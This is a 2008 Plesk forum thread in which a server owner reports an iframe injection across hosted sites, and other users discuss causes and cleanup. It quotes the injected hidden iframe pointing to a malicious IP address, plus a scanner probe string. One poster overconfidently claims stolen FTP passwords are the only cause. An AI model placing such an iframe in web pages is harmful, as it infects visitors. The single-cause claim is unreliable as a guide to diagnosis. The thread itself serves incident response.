1. Please take a little time for this simple survey! Thank you for participating!
    Dismiss Notice
  2. Dear Pleskians, please read this carefully! New attachments and other rules Thank you!
    Dismiss Notice
  3. Dear Pleskians, I really hope that you will share your opinion in this Special topic for chatter about Plesk in the Clouds. Thank you!
    Dismiss Notice

iframe exploit - ISC Sans iframeDOLLARS.com

Discussion in 'Plesk for Linux - 8.x and Older' started by raaqi, Feb 29, 2008.

  1. raaqi

    raaqi Guest

    0
     
    Hi Guys,

    Had iframedollars.com exploit my server today. In the logwatch was this:

    Requests with error response codes
    400 Bad Request
    /w00tw00t.at.ISC.SANS.DFind:): 2 Time(s)

    Several sites had the injection which looked like this in all index.html, htm, php files etc.

    <iframe src= http://58.65.232.33/counter.php frameborder="0" width="1" height="1" scrolling="no" name=counter></iframe>

    I'm not sure how this exploit occurred. I've looked through logs & can't figure it out. Anyone know where i should be looking?
     
  2. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    It could be through either a vulnerable application on the site, or a compromised user account. I would start by looking at the timestamp on the file(s) modified, then cross reference that against your ftp and http logs to see what was going on with that account/domain at the time.
     
  3. raaqi

    raaqi Guest

    0
     
    I replaced the files on most of the accounts, except for one (so i could traceback). This sites domain does not resolve to my server. It has no current access logs or xferlogs, which means the exploit came through another website and managed to modify other sites on the box. No idea..
     
  4. atomicturtle

    atomicturtle Golden Pleskian

    29
     
    Joined:
    Nov 20, 2002
    Messages:
    2,110
    Likes Received:
    7
    Location:
    Washington, DC
    If that is the case, then they likely have compromised the system completely. I would start investigating all the files that changed around that time on the system. Also I just put out updates to chkrootkit (0.48) and rkhunter (1.3.2) in my archive, you should check those out as well. Ive started a basic forensic procedure here:
    http://www.atomicorp.com/wiki/index.php/Compromised_System
     
  5. bandurao

    bandurao Guest

    0
     
    How does this hacking takes place:

    This hacking does not takes place by any PHP application vulnerability nor any kernel bug nor apache bug nor cpanel or Plesk bug. Those accounts files are affected whose FTP logins are leaked.

    Beleive me, I am reasearching behind this iframe and java script hack from last 10 months.

    ONLY THOSE ACCOUNTS ARE HACKED WHOSE FTP LOGIN DETAILS ARE LEAKED AND ARE WITH HACKER !!!!

    How it's done
    This is a sophisticated operation, and the infection cycle is involved, but basically, the hacker(s) are setting up innocent looking sites (or using previously hacked sites where the owner is usually unaware of being compromised) and loading them with expensive hacking tools like Mpack. When someone visits that site, their browser is detected and attacked (browsers affected are IE, firefox and opera). The visitor is unaware that they may have a keylogger that sends the persons passwords ect to the hacker(s) and moves on. If the innocent visitor has an ftp or root password for any internet sites, the hackers use a program that goes to the persons site(s) and instantly adds the hidden iframe to every index type page. This is why there seems to be no indication that the site has been compromised, as the hackers already have the ftp or root passwords to login. And since they have at least your account ftp pass, whatever permissions your folders and files are set to make no difference.

    After they put the iframe code into that person's pages, anyone visiting that site will be redirected to the hackers infection site, where the person's computer will be injected and infected. The hackers are depending on site owners not knowing their sites have been hacked so that the number of hacked sites will grow (as they have starting in Italy) into the tens of thousands... Please don't think you can depend solely on your antivirus software to protect your computer. It more than likely won't help you. For $1000 dollars, the russian hacking bulletin boards are offering Mpack with 1 year support and a GUARANTEE that virus programs will not catch the keyloggers. SO, keep your virus program updated, but don't depend on it completely!


    This way this hack is spreading fastly from one computer to another broadcasting the passwords to hackers.During my research in this, I even found some of the password files collected by the hack on some of the hacked server, where they pass this password file to thier tool to add the code. In some cases Google bots picks this files and you can even find the login details of FTP accounts and Server root login details in google.

    ===============================================
    Solution:
    ===============================================


    For Server Administrators:

    If you are having this problem server wide then the only possibility is your root password is used for this. Just change the password and this HACK WILL STOP

    For individual person owning just a domain and not server:

    If you are facing this problem and your administrator says its only your account, just change the FTP password and it will stop

    You must have removed the code many times and it comes again, why ???
    As you dont change the FTP password. So change that first.

    Just changing password is not complete solution but is the first step.
    Whats next, your password is leaked that means your computer is sending out the passwords, so I would suggest you to do a clean format first and then install any antivirus of spyware which you think could block it. But the best solution is to clean format the computer.

    Just do the two things:

    1) Change the FTP or root password of server
    2) Clean format the PC

    and take care in future, you dont visit any lof the virsu links made by this hack.
    Also to keep your password secure I would suggest you to use any password manager software like:

    http://keepass.info/

    This is a FREE OpenSource Software


    I can assure you this is confirmed solution and will definitely help you all.
    Please try it and also when you are too confirmed, please spread this message in as many forums as you can so that others also come to know how to stop it.

    Comments can be sent from:
    http://shellscripters.com/contact.htm
     
  6. ikati

    ikati Guest

    0
     
    bandurao, your home page seems to be infected. Avast caught it when I went to look at your site after reading your post.

    Do you have any ideas of how it happened, if you were changing your password?

    I've read that they pass a script by entering it in a form or some type of input, then the script has program permission which is usually the same as owner permission, then it injects the files it wants to.
     
Loading...